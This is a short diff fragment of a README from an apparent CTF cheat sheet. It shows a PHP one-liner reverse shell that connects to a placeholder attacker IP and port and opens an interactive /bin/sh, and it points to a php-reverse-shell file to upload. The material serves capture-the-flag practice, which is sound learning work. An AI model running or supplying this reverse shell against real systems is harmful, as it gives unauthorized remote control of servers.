cozuxhub/Cheat-Sheet-For-CTF-s/README.md

 ```
 php -r '$sock=fsockopen("[Your IP Address]",[Port]);exec("/bin/sh -i <&3 >&3 2>&3");'
 ```
-> First, open the php document.
+> If we can upload files, open the php document.
 (If you search for this php file as php-reverse-shell, you will see many examples.)
 ```
 nano ../php-reverse-shell.php
 ```